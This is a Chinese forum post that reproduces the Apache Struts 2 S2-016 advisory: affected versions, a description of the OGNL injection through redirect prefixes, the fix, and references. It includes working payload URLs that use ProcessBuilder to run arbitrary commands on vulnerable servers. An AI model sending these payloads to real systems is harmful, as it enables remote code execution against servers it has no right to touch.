阿熊
阿熊
元老
发贴: 5644
积分: 454
|
于 2013-07-24 10:30
影响系统 Apache Struts 2.0.0-2.3.15 危害 远程攻击者利用漏洞以应用程序上下文执行任意代码。 攻击所需条件 攻击者必须访问Struts应用。 漏洞信息 Apache Struts框架是一个基于Java Servlets,JavaBeans, 和 JavaServer Pages (JSP)的Web应用框架的开源项目。 Apache Struts 2 DefaultActionMapper在处理短路径重定向参数前缀"action:"/"redirect:"/"redirectAction:"时存在命令执行漏洞,由于对"action:"/"redirect:"/"redirectAction:"后的URL信息使用OGNL表达式处理,远程攻击者可以利用漏洞提交特殊URL可用于执行任意Java代码。 测试方法 1,简单表达式 http://host/struts2-blank/example/X.action?action:%25{3*4} http://host/struts2-showcase/employee/save.action?redirect:%25{3*4} 2,命令执行 http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} 安全建议 厂商解决方案 Apache Struts 2.3.15.1已经修复此漏洞,建议用户下载更新: http://struts.apache.org/ 漏洞提供者 Takeshi Terada of Mitsui Bussan Secure Directions, Inc. 漏洞消息链接 http://struts.apache.org/release/2.3.x/docs/s2-016.html http://struts.apache.org/release/2.3.x/docs/version-notes-23151.html http://packetstormsecurity.com/files/122442/Apache-Struts-2-Open-Redirection-Command-Execution.html
|